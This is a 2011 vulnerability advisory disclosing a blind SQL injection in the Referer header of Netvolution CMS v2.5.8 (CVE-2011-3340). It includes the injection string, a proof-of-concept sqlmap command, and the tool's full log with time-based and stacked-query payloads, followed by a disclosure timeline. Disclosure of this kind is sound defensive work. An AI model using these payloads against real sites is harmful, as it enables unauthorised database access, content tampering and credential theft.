POSTED BY: Dimitrios Glynos / 03.10.2011

Netvolution referer header SQL injection vulnerability

CENSUS ID:CENSUS-2011-0001
CVE ID:CVE-2011-3340
Affected Products:Netvolution v2.5.8 (ASP). Other versions may also be vulnerable.
Class:Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) (CWE-89)
Remote:Yes
Discovered by:Patroklos Argyroudis
Researched and Exploited by:Dimitris Glynos

Netvolution v2.5.8 is vulnerable to a blind SQL injection attack in the HTTP “referer” header. A malicious user may utilize this vulnerability to modify content on the vulnerable website, inject malicious javascript code to a visitor’s browser, collect CMS usernames and plaintext passwords and, in some cases, execute commands on the system hosting the database server. This is a critical vulnerability since it does not require authentication and its exploitation may go undetected.

Details

Netvolution is a commercial content management system by ATCOM S.A. with a large number of installations, most of them belonging to Greek companies and organizations.

It appears that the Netvolution platform has both ASP and PHP implementations. This advisory concerns a bug found in the ASP implementation (version 2.5.8). We were unable to verify with the vendor if this bug also affects other versions of the ASP (or PHP) codebase.

The bug is located in the code that parses the “HTTP Referer” header value. An attacker may inject arbitrary SQL commands to the Netvolution database by using a “Referer” header like the following:

Referer: 1','0'); SQL

In the above example “SQL” is a placeholder; the attacker would replace this with the SQL commands to be executed by the database. The CMS does not provide feedback on the output of the SQL commands but collection of this output is still possible through “blind” SQL Injection techniques.

The following Proof of Concept, shows sqlmap mounting a blind SQL injection attack on a vulnerable website and retrieving the database banner:

user@host:~/sqlmap$ ./sqlmap.py -u \
   'http://site.com/default.asp?pid=45&la=1&nid=100&ny=2011' -p referer \
   --referer="1','0'); " -b

    sqlmap/1.0-dev (r4379) — automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable local,
state and federal laws. Authors assume no liability and are not responsible for
any misuse or damage caused by this program 

[*] starting at 11:01:55

[11:01:56] [WARNING] the testable parameter 'referer' you provided is not inside
the GET
[11:01:56] [INFO] using '/home/user/sqlmap/output/site.com/session' as session file
[11:01:56] [INFO] testing connection to the target url
[11:01:57] [WARNING] there is a DBMS error found in the HTTP response bodywhich
could interfere with the results of the tests
[11:01:57] [WARNING] the testable parameter 'referer' you provided is not inside
the Cookie
[11:01:57] [INFO] testing if the url is stable, wait a few seconds
[11:01:59] [INFO] url is stable
[11:01:59] [INFO] testing if Referer parameter 'Referer' is dynamic
[11:01:59] [WARNING] Referer parameter 'Referer' appears to be not dynamic
[11:02:00] [INFO] heuristic test shows that Referer parameter 'Referer' might be
injectable (possible DBMS: Microsoft SQL Server)
[11:02:00] [INFO] testing sql injection on Referer parameter 'Referer'
[11:02:00] [INFO] testing 'AND boolean-based blind — WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server.
Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[11:02:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based
— WHERE or HAVING clause'
[11:02:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[11:02:31] [INFO] Referer parameter 'Referer' is 'Microsoft SQL Server/Sybase
stacked queries' injectable
[11:02:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[11:02:43] [INFO] Referer parameter 'Referer' is 'Microsoft SQL Server/Sybase
time-based blind' injectable
[11:02:43] [INFO] testing 'Generic UNION query (NULL) — 1 to 10 columns'
Referer parameter 'Referer' is vulnerable. Do you want to keep testing the
others? [y/N] N
sqlmap identified the following injection points with a total of 33 HTTP(s) requests:
---
Place: Referer
Parameter: Referer
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: 1','0'); ; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: 1','0');  WAITFOR DELAY '0:0:5'--
---

[11:02:58] [INFO] testing Microsoft SQL Server
[11:02:59] [WARNING] it is very important not to stress the network adapter's
bandwidth during usage of time-based queries
[11:03:04] [INFO] confirming Microsoft SQL Server
do you want to adjust the time delay to 3 seconds (due to good response times)? [Y/n] Y
[11:03:41] [INFO] the back-end DBMS is Microsoft SQL Server
[11:03:41] [INFO] fetching banner
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS operating system: Windows 2003 Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 — 9.00.5057.00 (Intel X86)
        Mar 25 2011 13:50:04
        Copyright (c) 1988-2005 Microsoft Corporation
        Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---

[11:58:52] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) — 21 times
[11:58:52] [INFO] Fetched data logged to text files under
'/home/user/sqlmap/output/site.com'

[*] shutting down at 11:58:52

Although Netvolution has been found to be vulnerable to numerous injection attacks in the past (1, 2, 3) this particular bug is especially interesting as it manifests itself in a HTTP header field. As header field values are sometimes not included in HTTP transaction logs, an attack based on this vulnerability may go unnoticed by web server administrators.

The vendor has responded to this advisory with an update to the CMS software. Administrators of Netvolution websites must check with the software vendor to ensure that they are running a non-vulnerable version of the CMS.

Disclosure Timeline

CVE assignment:August 30th, 2011
Vendor Contact(s):August 31st, 2011
September 1st, 2011
September 27th, 2011
Public Disclosure:October 3rd, 2011